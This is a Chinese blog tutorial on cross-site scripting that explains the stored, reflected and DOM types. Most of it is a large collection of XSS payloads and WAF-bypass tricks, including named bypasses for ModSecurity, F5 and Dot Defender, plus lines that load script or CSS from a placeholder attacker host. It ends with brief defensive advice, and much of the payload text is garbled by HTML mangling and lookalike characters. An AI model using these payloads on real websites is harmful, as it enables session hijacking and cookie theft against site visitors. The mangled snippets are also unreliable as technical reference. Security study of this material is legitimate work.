WEB安全总结之读懂Xss

原理

Xss攻击通常是指攻击者利用在网页开发时程序员设计不严谨产生的漏洞，通过设计巧妙的的方法将代码注入到网页（或服务器）中，使用户在浏览相关网页时加载并执行恶意代码。以达到自己恶意的目的，通常会获得目标更高的权限，会话和cookie等内容。通常这些网页程序会使用Javascript，Java、vbscript（较少），或普通的HTML代码生成。JavaScript可以用来获取用户的cookie，改变网页内容，url跳转，

类型

存储型

攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。这就意味着只要访问了这个页面的访客，都有可能会执行这段恶意脚本，因此储存型XSS的危害会更大。因为存储型XSS的代码存在于网页的代码中，可以说是永久型的。

存储型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。

反射型

反射型XSS也常被称作非持久性XSS，是比较常见的一种。当用户访问一段带有XSS代码的URL请求时，服务器端接收数据后处理，然后把带有XSS代码的数据发送到浏览器，浏览器解析这段含有XSS代码后，会形成XSS漏洞，这个漏洞形成过程就像一次反射，故称为反射型XSS。

示例

 

 

DOM型

DOM型XSS，先了解一下DOM，DOM型XSS就是基于DOM文档对象模型的。对于浏览器来说，DOM文档就是一份XML文档，DOM型不用将恶意脚本传输到服务器在返回客户端，这就是DOM型和反射、存储型的区别，客户端JavaScript可以访问浏览器的DOM文本对象模型是利用的前提，当确认客户端代码中有DOM型XSS漏洞时，并且能诱使(钓鱼)一名用户访问自己构造的URL，就说明可以在受害者的客户端注入恶意脚本。利用步骤和反射型很类似，但是唯一的区别就是，构造的URL参数不用发送到服务器端，可以达到绕过WAF、躲避服务端的检测效果。

利用

XSS会话劫持

 

XSS　Farmework

 

Xss getshell

 

XSS蠕虫

 

无过滤的情况进行利用

借助常见标签

以下列举的标签大部分是可以自动触发js代码的，无需用户去交互，大部分情况下我们也是希望是程序自动触发而不是等用户触发

 alert("xss"); 

  

  

 竞争焦点，从而触发onblur事件  

 通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发  

 

 

使用open属性触发ontoggle事件，无需用户去触发

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发

利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发

onscroll=alert("xss");>

</p> <p><textarea onfocus=alert("xss"); autofocus></p> <p><keygen></p> <p><keygen autofocus onfocus=alert(1)> //仅限火狐</p> <p><marquee></p> <p><marquee onstart=alert("xss")></marquee> //Chrome不行，火狐和IE都可以</p> <p><isindex></p> <p><isindex type=image src=1 onerror=alert("xss")>//仅限于IE</p> <p>利用link远程包含js文件</p> <p>PS：在无CSP的情况下才可以</p> <p> </p> <p><link rel=import href="http://127.0.0.1/1.js"></p> <p>javascript伪协议</p> <p><a>标签</p> <p> </p> <p><a href="javascript:alert(`xss`);">xss</a></p> <p><iframe>标签</p> <p> </p> <p><iframe src=javascript:alert('xss');></iframe></p> <p><img>标签</p> <p> </p> <p><img src=javascript:alert('xss')>//IE7以下</p> <p><form>标签</p> <p> </p> <p><form action="Javascript:alert(1)"><input type=submit></p> <p>其它</p> <p>expression属性</p> <p> </p> <p><img style="xss:expression(alert('xss''))"> // IE7以下</p> <p><div style="color:rgb(''�x:expression(alert(1))"></div> //IE7以下</p> <p><style>#test{x:expression(alert(/XSS/))}</style> // IE7以下</p> <p>background属性</p> <p> </p> <pre><table background=javascript:alert(1)></table> //在Opera 10.5和IE6上有效</pre> <p> </p> <h3>有过滤的情况进行注入</h3> <h4>过滤空格</h4> <p>用/代替空格</p> <pre><img/src="x"/onerror=alert("xss");></pre> <p>过滤关键字</p> <h4>大小写绕过</h4> <pre><strong><</strong>ImG sRc<strong>=</strong>x onerRor<strong>=</strong>alert<strong>(</strong>"xss"<strong>);</strong><strong>></strong></pre> <h4>双关键字</h4> <p>有些waf可能会只替换一次且是替换为空，这种情况下我们可以考虑双写关键字绕过</p> <p><strong><</strong>imimgg srsrcc<strong>=</strong>x onerror<strong>=</strong>alert<strong>(</strong>"xss"<strong>);</strong><strong>></strong></p> <h4>字符拼接</h4> <p>利用eval</p> <p><strong><</strong>img src<strong>=</strong>"x" onerror<strong>=</strong>"a=`aler`;b=`t`;c='(`xss`);';eval(a+b+c)"<strong>></strong></p> <p>利用top</p> <p><script>top["al"+"ert"](`xss`);</script></p> <h4>其他字符混淆</h4> <p>有的waf可能是用正则表达式去检测是否有xss攻击，如果我们能fuzz出正则的规则，则我们就可以使用其它字符去混淆我们注入的代码了<br> 下面举几个简单的例子</p> <p>可利用注释、标签的优先级等</p> <p>1.<<script>alert("xss");//<</script></p> <p>2.<title><img src=</title>><img src=x onerror="alert(`xss`);"> //因为title标签的优先级比img的高，所以会先闭合title，从而导致前面的img标签无效</p> <p>3.<SCRIPT>var a="\\";alert("xss");//";</SCRIPT></p> <h4>编码绕过</h4> <p>Unicode编码绕过</p> <p><strong><</strong>img src<strong>=</strong>"x" onerror<strong>=</strong>"alert("xss");"<strong>></strong></p> <p> </p> <p><strong><</strong>img src<strong>=</strong>"x" onerror<strong>=</strong>"eval('\u0061\u006c\u0065\u0072\u0074\u0028\u0022\u0078\u0073\u0073\u0022\u0029\u003b')"<strong>></strong></p> <p>url编码绕过</p> <p><strong><</strong>img src<strong>=</strong>"x" onerror<strong>=</strong>"eval(unescape('%61%6c%65%72%74%28%22%78%73%73%22%29%3b'))"<strong>></strong></p> <p><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe></p> <p>Ascii码绕过</p> <p><strong><</strong>img src<strong>=</strong>"x" onerror<strong>=</strong>"eval(String.fromCharCode(97,108,101,114,116,40,34,120,115,115,34,41,59))"<strong>></strong></p> <p>hex绕过</p> <p><img src=x onerror=eval('\x61\x6c\x65\x72\x74\x28\x27\x78\x73\x73\x27\x29')></p> <p>八进制</p> <p><img src=x onerror=alert('\170\163\163')></p> <p>base64绕过</p> <p><img src="x" onerror="eval(atob('ZG9jdW1lbnQubG9jYXRpb249J2h0dHA6Ly93d3cuYmFpZHUuY29tJw=='))"></p> <p><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4="></p> <h4>过滤双引号、单引号</h4> <p>1.如果是html标签中，我们可以不用引号。如果是在js中，我们可以用反引号代替单双引号</p> <p><img src="x" onerror=alert(`xss`);></p> <p>2.使用编码绕过，具体看上面我列举的例子，我就不多赘述了</p> <h4>过滤括号</h4> <p>当括号被过滤的时候可以使用throw来绕过</p> <p><svg/onload="window.onerror=eval;throw'=alert\x281\x29';"></p> <p>过滤url地址</p> <h4>使用url编码</h4> <pre><code><img src="x" onerror=document.location=`http://%77%77%77%2e%62%61%69%64%75%2e%63%6f%6d/`></code></pre> <h4>使用IP</h4> <p>1.十进制IP</p> <pre><code><img src="x" onerror=document.location=`http://2130706433/`></code></pre> <p>2.八进制IP</p> <pre><code><img src="x" onerror=document.location=`http://0177.0.0.01/`></code></pre> <p>3.hex</p> <pre><code><img src="x" onerror=document.location=`http://0x7f.0x0.0x0.0x1/`></code></pre> <p>4.html标签中用<code>//</code>可以代替<code>http://</code></p> <pre><code><img src="x" onerror=document.location=`//www.baidu.com`></code></pre> <p>5.使用<code>\\</code></p> <pre><code>但是要注意在</code><code>windows</code><code>下</code><code>\</code><code>本身就有特殊用途，是一个</code><code>path </code><code>的写法，所以</code><code>\\</code><code>在</code><code>Windows</code><code>下是</code><code>file</code><code>协议，在</code><code>linux</code><code>下才会是当前域的协议</code></pre> <p>6.使用中文逗号代替英文逗号<br> 如果你在你在域名中输入中文句号浏览器会自动转化成英文的逗号</p> <p><img src="x" onerror="document.location=`http://www。baidu。com`">//会自动跳转到百度</p> <p> </p> <h2>绕过</h2> <p>我们友情进行XSS检查，偶然跳出个小弹窗，其中我们总结了一些平时可能用到的XSS插入方式，方便我们以后进行快速检查，也提供了一定的思路，其中XSS有反射、存储、DOM这三类，至于具体每个类别的异同之处，本文不做学术介绍，直接介绍实际的插入方式。</p> <p> </p> <h3>常规插入及其绕过</h3> <h4>Script 标签</h4> <p>绕过进行一次移除操作：<br> <scr<script>ipt>alert("XSS")</scr<script>ipt><br> Script 标签可以用于定义一个行内的脚本或者从其他地方加载脚本：<br> <script>alert("XSS")</script><br> <script src="http://attacker.org/malicious.js"></script></p> <h4>JavaScript 事件</h4> <p>我们可以像如下这样在元素中定义 JavaScript 事件：<br> <div οnclick="alert('xss')"><br> 这个 JavaScript 代码当有人点击它后就会被执行，同时还有其他事件如页面加载或移动鼠标都可以触发这些事件。绝大部分的时间都被过滤器所移除了，但是依旧还有少量事件没有被过滤，例如，onmouseenter 事件：<divοnmοuseenter="alert('xss')">当用户鼠标移动到 div 上时就会触发我们的代码。<br> 另一个绕过的办法就是在属性和= 之间插入一个空格：<br> <div onclick ="alert('xss')"></p> <h4>行内样式(Inlinestyle)</h4> <p>我们同样可以在行内样式里利用 IE 浏览器支持的动态特性：<br> <div style="color: expression(alert('XSS'))"><br> 过滤器会检查关键字 style，随后跟随的不能是 <，在随后是 expression：<br> /style=[^<]*((expression\s*?[<]∗?)|(behavior\s*:))[^<]*(?=\>)/Uis<br> 所以，让我们需要把 < 放到其他地方：<br> <div style="color: '<'; color: expression(alert('XSS'))"></p> <h4>CSS import</h4> <p>IE 浏览器支持在 CSS 中扩展 JavaScript，这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的，因为攻击者现在可以在原始页面中执行 JavaScript 代码了。<br> <style><br> @import url("http://attacker.org/malicious.css");<br> </style><br> malicious.css：<br> body {<br>     color: expression(alert('XSS'));<br> }<br> 为了绕过对 @import 的过滤，可以在 CSS 中使用反斜杠进行绕过：<br> <style><br> @imp\ort url("http://attacker.org/malicious.css");<br> </style><br> IE 浏览器会接受反斜杠，但是我们绕过了过滤器。</p> <h4>Javascript URL</h4> <p>链接标签里可以通过在 URL 中使用 javascript:… 来执行 JavaScript：<br> <a href="javascript:alert('test')">link</a><br> 上面的过滤会从代码中移除 javascript:，所以我们不能直接这么写代码。但我们可以尝试改变 javascript:的写法，使它依旧可以被浏览器执行但又不匹配正则表达式。首先来尝试下 URL 编码：<br> <a href="javascript:alert('xss')">link</a><br> 上面这段代码不匹配正则表达式，但是浏览器依旧会执行它，因为浏览器会首先进行 URL 解码操作。<br> 另外，我们还可以使用 VBScript，虽然它在 IE11 中被禁用了，但依旧可以运行在旧版本的 IE 或者启用兼容模式的 IE11 上。我们可以使用类似上面 JavaScript 的方式来插入 VBScript 代码：<br> <a href='vbscript:MsgBox("XSS")'>link</a><br> '-confirm`1`-'</p> <p>'-confirm(1)-'</p> <h4>利用字符编码</h4> <p>%c1;alert(/xss/);//</p> <h4>绕过长度限制</h4> <p>"οnclick=alert(1)//<br> "><!--<br> --><script>alert(xss);<script></p> <h4>使用<base>标签</h4> <p><script>alert(navigator.userAgent)<script><br> <script>alert(88199)</script><br> <script>confirm(88199)</script><br> <script>prompt(88199)</script><br> <script>\u0061\u006C\u0065\u0072\u0074(88199)</script><br> <script>+alert(88199)</script><br> <script>alert(/88199/)</script><br> <script src=data:text/javascript,alert(88199)></script><br> <scriptsrc=data:text/javascript,alert(88199)></script><br> <script>alert(String.fromCharCode(49,49))</script><br> <script>alert(/88199/.source)</script><br> <script>setTimeout(alert(88199),0)</script><br> <script>document['write'](88199);</script><br> <br> <anytag οnmοuseοver=alert(15)>M<br> <anytag οnclick=alert(16)>M<br> <a οnmοuseοver=alert(17)>M<br> <a οnclick=alert(18)>M<br> <a href=javascript:alert(19)>M<br> <button/οnclick=alert(20)>M<br> <form><button<br> formaction=javascript:alert(21)>M<br> <form/action=javascript:alert(22)><input/type=submit><br> <form οnsubmit=alert(23)><button>M<br> <form οnsubmit=alert(23)><button>M<br> <img src=x οnerrοr=alert(24)> 29<br> <body/οnlοad=alert(25)><br> <br> <body<br> οnscrοll=alert(26)><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br><br><br> <br><br><br><br><br><br><br><br><br><br><br><br> <input autofocus><br> <br> <iframe src="http://0x.lv/xss.swf"></iframe><br> <iframe/οnlοad=alert(document.domain)></iframe><br> <IFRAME SRC="javascript:alert(29);"></IFRAME><br> <meta http-equiv="refresh" content="0;<br> url=data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2830%29%3C%2%73%63%72%69%70%74%3E"><br> <object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object><br> <object data="javascript:alert(document.domain)"><br> <br> <br> <marquee onstart=alert(30)></marquee><br> <isindex type=image src=1 οnerrοr=alert(31)><br> <isindex action=javascript:alert(32) type=image><br> <input οnfοcus=alert(33) autofocus><br> <input οnblur=alert(34) autofocus><input autofocus></p> <p> </p> <h3>规则探测及绕过</h3> <h4>WAF规则探测</h4> <p>使用无害的payload，类似<b>,<i>,<u>观察响应，判断应用程序是否被HTML编码，是否标签被过滤，是否过滤<>等等；<br> <strong>如果过滤闭合标签</strong>，尝试无闭合标签的payload（<b,<i,<marquee）观察响应；<br> <strong>尝试以下的payload</strong><br> <script>alert(1);</script><br> <script>prompt(1);</script><br> <script>confirm(1);</script></p> <p><scriptsrc="http://rhainfosec.com/evil.js"></p> <p> </p> <h4>大小写混合字符</h4> <p><scRiPt>alert(1);</scrIPt></p> <p><strong>如果大小写不行的话，<script>被过滤尝试</strong><scr<script>ipt>alert(1)</scr<script>ipt>；</p> <p><strong>使用<a>标签测试</strong><br> <a  href=“http://www.google.com">Clickme</a><br> <a被过滤？<br> href被过滤？<br> 其他内容被过滤？<br> 如果没有过滤尝试使用<br> <a href=”javascript:alert(1)”>Clickme</a><br> 尝试使用错误的事件查看过滤<br> <a href="rhainfosec.com"onclimbatree=alert(1)>ClickHere</a><br> HTML5拥有150个事件处理函数，可以多尝试其他函数<br> <body/οnhashchange=alert(1)><a href=#>clickit</p> <p> </p> <h4>测试其他标签</h4> <p>src属性<br> <img src=x      οnerrοr=prompt(1);><br> <img/src=aaa.jpg      οnerrοr=prompt(1);<br> <video src=x      οnerrοr=prompt(1);><br> <audio src=x      οnerrοr=prompt(1);><br> iframe<br> <iframesrc="javascript:alert(2)"><br> <iframe/src="data:text/html; base64 ,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="><br> Embed<br> <embed/src=//goo.gl/nlX0P><br> Action<br> <form action="Javascript:alert(1)"><input type=submit><br> <isindex action="javascript:alert(1)" type=image><br> <isindexaction=j a vas c r ipt:alert(1)type=image><br> <isindex action=data:text/html, type=image><br> mario验证<br> <span class="pln">    </span><spanclass="tag"><formaction</span><spanclass="pun">=</span><spanclass="atv">&#039;data:text&sol;html,&lt;script&gt;alert(1)&lt/script&gt&#039;</span><spanclass="tag">><button></span><spanclass="pln">CLICK</span><br> “formaction”属性<br> <isindexformaction="javascript:alert(1)"     type=image><br> <input type="image" formaction=JaVaScript:alert(0)><br>  <form><buttonformaction=javascript:alert(1)>CLICKME<br> “background”属性<br> <table background=javascript:alert(1)></table> // Works on Opera10.5      and IE6<br> “posters” 属性<br> <video poster=javascript:alert(1)//></video> // Works Upto Opera10.5<br> “data”属性<br> <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4="><br> <object/data=//goo.gl/nlX0P?<br> “code”属性<br> <applet code="javascript:confirm(document.cookie);"> // FirefoxOnly<br> <embed  code="http://businessinfo.co.uk/labs/xss/xss.swf"     allowscriptaccess=always><br> 事件处理<br> <svg/οnlοad=prompt(1);><br> <marquee/onstart=confirm(2)>/<br> <body οnlοad=prompt(1);><br> <select autofocus οnfοcus=alert(1)><br> <textarea autofocus οnfοcus=alert(1)><br> <keygen autofocus οnfοcus=alert(1)><br> <video><source οnerrοr="javascript:alert(1)"><br> 短payload<br> <q/oncut=open()><br> <q/oncut=alert(1)> //      Useful in-case of payloadrestrictions.<br> 嵌套欺骗<br> <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)><br> <body  language=vbsοnlοad=alert-1 // Works with IE8<br> <commandοnmοuseοver="\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6  9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B">Save</command>     // Works with IE8<br> 圆括号被过滤<br> <a οnmοuseοver="javascript:window.οnerrοr=alert;throw 1><br> <img src=x οnerrοr="javascript:window.οnerrοr=alert;throw 1"><br> <body/οnlοad=javascript:window.οnerrοr=eval;throw'=alert\x281\x29';<br> Expression 属性<br> <img style="xss:expression(alert(0))"> // Works upto IE7.<br> <div style="color:rgb(''x:expression(alert(1))"></div>     // Works upto IE7.<br> <style>#test{x:expression(alert(/XSS/))}</style>     // Works upto IE7<br> “location”属性<br> <a οnmοuseοver=location=’javascript:alert(1)>click<br> <body οnfοcus="location='javascrpt:alert(1) >123<br> 其他Payload<br> <meta http-equiv="refresh"     content="0;url=//goo.gl/nlX0P"><br> <meta http-equiv="refresh"     content="0;javascript:alert(1)"/><br> <svg xmlns="http://www.w3.org/2000/svg"><g     οnlοad="javascript:\u0061lert(1);"></g></svg> //     By @secalert<br> <svg xmlns:xlink=" r=100 /><animateattributeName="xlink:href"     values=";javascript:alert(1)" begin="0s"     dur="0.1s" fill="freeze"/> // By Mario<br> <svg><![CDATA[><imagexlink:href="]]><img/src=xx:xοnerrοr=alert(2)//"</svg>     // By @secalert<br> <meta content=" 1 ;JAVASCRIPT:alert(1)" http-equiv="refresh"/><br> <math><a xlink:href="//jsfiddle.net/t846h/">click // ByAshar Javed<br> （）；：被过滤<br> <svg><script>alert(/1/)</script>     // Works With All Browsers<br> ( is html encoded to (<br>  ) is html encoded to )<br> Opera的变量<br> <svg><script>alert(      1) // Workswith Opera Only<br> 实体解码<br> </script><script>alert(1)</script><br> <a href="j&#x26#x41;vascript:alert%252831337%2529">Hello</a><br> 编码<br> JavaScript是很灵活的语言，可以使用十六进制、Unicode、HTML等进行编码，以下属性可以被编码<br> （支持HTML, Octal, Decimal,Hexadecimal, and Unicode）<br> href=<br> action=<br> formaction=<br> location=<br> on*=<br> name=<br> background=<br> poster=<br> src=<br> code=<br> data= //只支持base64</p> <p> </p> <h4>基于上下文的过滤</h4> <p>WAF最大的问题是不能理解内容，使用黑名单可以阻挡独立的js脚本，但仍不能对xss提供足够的保护，如果一个反射型的XSS是下面这种形式</p> <h4>输入反射属性</h4> <p><inputvalue="XSStest" type=text><br> 我们可以使用 “><imgsrc=x  οnerrοr=prompt(0);>触发，但是如果<>被过滤，我们仍然可以使用“ autofocusοnfοcus=alert(1)//触发，基本是使用“ 关闭value属性，再加入我们的执行脚本<br> " οnmοuseοver="prompt(0) x="<br> " οnfοcusin=alert(1)     autofocus x="<br> " οnfοcusοut=alert(1)     autofocus x="<br> " οnblur=alert(1) autofocus     a="<br> 输入反射在<script>标签内<br> 类似这种情况：<br> <script><br> Var<br> x=”Input”;<br> </script><br> 通常，我们使用“></script>,闭合前面的</script>标签，然而在这种情况，我们也可以直接输入执行脚本alert(), prompt()<br> confirm() ，例如：<br> “;alert(1)//</p> <h4>非常规事件监听</h4> <p>DOMfocusin,DOMfocusout,等事件，这些需要特定的事件监听适当的执行。例如：<br> ";document.body.addEventListener("DOMActivate",alert(1))//<br> ";document.body.addEventListener("DOMActivate",prompt(1))//<br> ";document.body.addEventListener("DOMActivate",confirm(1))//<br> 此类事件的列表<br> DOMAttrModified<br> DOMCharacterDataModified<br> DOMFocusIn<br> DOMFocusOut<br> DOMMouseScroll<br> DOMNodeInserted<br> DOMNodeInsertedIntoDocument<br> DOMNodeRemoved<br> DOMNodeRemovedFromDocument<br> DOMSubtreeModified</p> <h4>超文本内容</h4> <p>代码中的情况如下<br> <a<br> href=”Userinput”>Click</a><br> 可以使用javascript:alert(1)//直接执行<a<br> href=”javascript:alert(1)//”>Click</a></p> <h4>变形</h4> <p>主要包含大小写和JavaScript变形<br> javascript:alert(1)<br> javaSCRIPT:alert(1)<br> JaVaScRipT:alert(1)<br> javas cript:\u0061lert(1);<br> javascript:\u0061lert(1)<br> avascript:alert(document.cookie)     // AsharJaved<br> IE10以下和URI中可以使用VBScript<br> vbscript:alert(1);<br> vbscript:alert(1);<br> vbscr ipt:alert(1)"<br> Data URl<br> data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==</p> <h4>JSON内容</h4> <p>反射输入<br> encodeURIComponent('userinput')<br> 可以使用<br> -alert(1)-<br> -prompt(1)-<br> -confirm(1)-<br> 结果<br> encodeURIComponent(''-alert(1)-'')<br> encodeURIComponent(''-prompt(1)-'')</p> <h4>输入反射在svg标签内</h4> <p>源码如下：<br> <svg><script>varmyvar=”YourInput”;</script></svg><br> 可以输入<br> www.site.com/test.php?var=text”;alert(1)//<br> 如果系统编码了”字符<br> <svg><script>varmyvar="text";alert(1)//";</script></svg><br> 原因是引入了附加的（XML）到HTML内容里，可以使用2次编码处理<br> 浏览器BUG</p> <h4>字符集BUG</h4> <p>字符集BUG在IE中很普遍，最早的bug是UTF-7。如果能控制字符集编码，我们可以绕过99% 的WAF过滤。<br> 示例<br> http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=XSS<br> 可以控制编码，提交<br> http://xsst.sinaapp.com/utf-32-1.php?charset=utf-8&v=”><img<br> src=x οnerrοr=prompt(0);><br> 可以修改为UTF-32编码形式<br> ???script?alert(1)?/script?<br> http://xsst.sinaapp.com/utf-32-1.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80</p> <h4>空字节</h4> <p>最长用来绕过mod_security防火墙，形式如下：<br> <scri%00pt>alert(1);</scri%00pt><br> <scri\x00pt>alert(1);</scri%00pt><br> <s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t><br> 空字节只适用于PHP 5.3.8以上的版本</p> <h4>语法BUG</h4> <p>RFC声明中节点名称不能是空格，以下的形式在javascript中不能运行<br> <script>alert(1);</script><br> <%0ascript>alert(1);</script><br> <%0bscript>alert(1);</script><br> <%, <//, <!,<?可以被解析成<，所以可以使用以下的payload<br> <//     style=x:expression\28write(1)\29> // Works upto IE7 参考http://html5sec.org/#71<br> <!--[if]><script>alert(1)</script     --> // Worksupto IE9 参考http://html5sec.org/#115<br> <?xml-stylesheet     type="text/css"?><root    style="x:expression(write(1))"/> // Works in IE7 参考http://html5sec.org/#77<br> <%div%20style=xss:expression(prompt(1))>     // Works Upto IE7</p> <h4>Unicode分隔符</h4> <p>[on\w+\s*]这个规则过滤了所有on事件，为了验证每个浏览器中有效的分隔符，可以使用fuzzing方法测试0×00到0xff，结果如下：<br> IExplorer=     [0x09,0x0B,0x0C,0x20,0x3B]<br> Chrome =     [0x09,0x20,0x28,0x2C,0x3B]<br> Safari = [0x2C,0x3B]<br> FireFox=     [0x09,0x20,0x28,0x2C,0x3B]<br> Opera = [0x09,0x20,0x2C,0x3B]<br> Android =     [0x09,0x20,0x28,0x2C,0x3B]<br> x0b在Mod_security中已经被过滤，绕过的方法：<br> <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>rhainfosec</p> <h4>缺少X-frame选项</h4> <p>通常会认为X-frame是用来防护点击劫持的配置，其实也可以防护使用iframe引用的xss漏洞<br> Docmodes<br> IE引入了doc-mode很长时间，提供给老版本浏览器的后端兼容性，有风险，攻击情景是黑客可以引用你站点的框架，他可以引入doc-mode执行css表达式<br> expression(open(alert(1)))<br> 以下POC可以插入到IE7中<br> <html><br>     <body><br>     <meta http-equiv="X-UA-Compatible"content="IE=EmulateIE7" /><br>     <iframesrc="https://targetwebsite.com"><br>     </body><br>     </html></p> <h4>Window.name欺骗</h4> <p>情景：我们用iframe加载一个页面，我们可以控制窗口的名称，这里也可以执行javascript代码<br> POC<br> <iframesrc='http://www.target.com?foo="xss autofocus/AAAAA  οnfοcus=location=window.name//'<br> name="javascript:alert("XSS")"></iframe><br> DOM型XSS<br> 服务器不支持过滤DOM型的XSS，因为DOM型XSS总是在客户端执行，看一个例子：<br> <script><br>     vari=location.hash;<br>     document.write(i);<br>     </script><br> 在一些情况下，反射型XSS可以转换成DOM型XSS：<br> http://www.target.com/xss.php?foo=<svg/οnlοad=location=/java/.source+/script/.source+location.hash[1]+/al/.source+/ert/.source+location.hash[2]+/docu/.source+/ment.domain/.source+location.hash[3]//#:()<br> 上面的POC只在[.+都被允许的情况下适用，可以使用location.hash注入任何不允许的编码<br> Location.hash[1] = :  // Defined at the first position after    the hash.<br> Location.hash[2]= (  // Defined at the second position after    the has<br> Location.hash[3] = ) // Defined     at third position after the hash.<br> 如果有客户端过滤可能不适用</p> <h4>ModSecurity绕过</h4> <p><scri%00pt>confirm(0);</scri%00pt><br> <a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>rhainfosec<br> 参考http://blog.spiderlabs.com/2013/09/modsecurity-xss-evasion-challenge-results.html</p> <h4>WEB KNIGHT绕过</h4> <p><isindexaction=j a vas c r ipt:alert(1)type=image><br> <marquee/onstart=confirm(2)><br> F5 BIG IP ASM and Palo ALTO绕过<br> <table background="javascript:alert(1)"></table> //IE6或者低版本Opera<br>     “/><marquee onfinish=confirm(123)>a</marquee><br> Dot Defender绕过<br> <svg/οnlοad=prompt(1);> <br> <isindex action="javas&tab;cript:alert(1)" type=image></p> <p><marquee/onstart=confirm(2)></p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <p> </p> <h2>修复XSS漏洞及防御</h2> <p>过滤一些危险字符，以及转义& < > " ' /等危险字符</p> <p>HTTP-only Cookie: 禁止 JavaScript 读取某些敏感 Cookie，攻击者完成 XSS 注入后也无法窃取此Cookie。</p> <p>设置CSP(Content Security Policy)</p> <p>输入内容长度限制</p> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1283316426253287424"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_2"></div> </div> <!-- 文章页-右侧3 动态广告位 --> <div id="right-3" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_3"></div> </div> </div> </div> </div> </div> </div> <div class="container"> <h4 class="pt20 mb15 mt0 border-top">你可能感兴趣的:(WEB安全总结之读懂Xss)</h4> <div id="paradigm-article-related"> <div class="recommend-post mb30"> <ul class="widget-links"> <li><a href="/article/1773611795592839168.htm" title="《昼颜》里的日本女人：相遇要万种风情，分手要残忍绝情" target="_blank">《昼颜》里的日本女人：相遇要万种风情，分手要残忍绝情</a> <span class="text-muted">迷影咖啡</span> <div>作者：迷之菌子神奇菇迷影咖啡：一本正经做烘焙，胡说八道聊电影漫天萤火虫消散之时良宵就将过去，人们也说含苞待放的花蕾总会开了又谢，因紧紧相拥而面红耳赤的躯体，便是我们经历过这热爱的证明。夫妻关系介绍《昼颜》是2014年电视剧《昼颜：工作日下午三点的恋人们》的续集，故事发在电视剧情节结束的三年后，讲述了已经恢复独身的纱和偶然与曾经的出轨对象北野重逢后再次陷入感情漩涡的故事。《昼颜》制作灵感源自利佳子在</div> </li> <li><a href="/article/1773611668312489984.htm" title="迎接2019" target="_blank">迎接2019</a> <span class="text-muted">唯有杜康1994</span> <div>告别2018这一年是机遇与挑战，痛苦与喜悦，失去与收获的一年一月:收获了第一份爱情，开始真正想去了解一个人三月:对工作有了更深入的认识，靠自己的力量完成晋升五月:搬家，住进了自己理想的公寓，一间属于自己的屋子。满地的书六月:外调广州，升经理，有了自己的第一个团队。七月:怀着自我否定，第一次完成了部门任务八月:第一个员工流失，痛哭不已明白无不散之筵席九月:员工陆续离开，经济是一切的根本。十月:陪员工</div> </li> <li><a href="/article/1773611163691581440.htm" title="亲子日记之祝姑姥姥生日快乐（282）" target="_blank">亲子日记之祝姑姥姥生日快乐（282）</a> <span class="text-muted">冰心雨露_d504</span> <div>2021年7月18日，周日，晴周日上班的不上班，上学的不上学，全家都属于休息状态，洗衣做饭是上午的主要任务，中午休息一会儿，下午比较晚了出去给梦怡买了二年级上册的口算题卡，然后去参加姑姑的生日聚餐，本来姑姑应该是周一生日，因为周一都要上班，就提前到周日过了，说是过生日其实就是想借此机会一家人聚聚，毕竟平常都忙，没有时间聚在一起，梦怡还给姑姥姥做了生日贺卡，虽然长相一般，重在心意。生日快乐</div> </li> <li><a href="/article/1773606496911818752.htm" title="3/31总结" target="_blank">3/31总结</a> <span class="text-muted">静心第一</span> 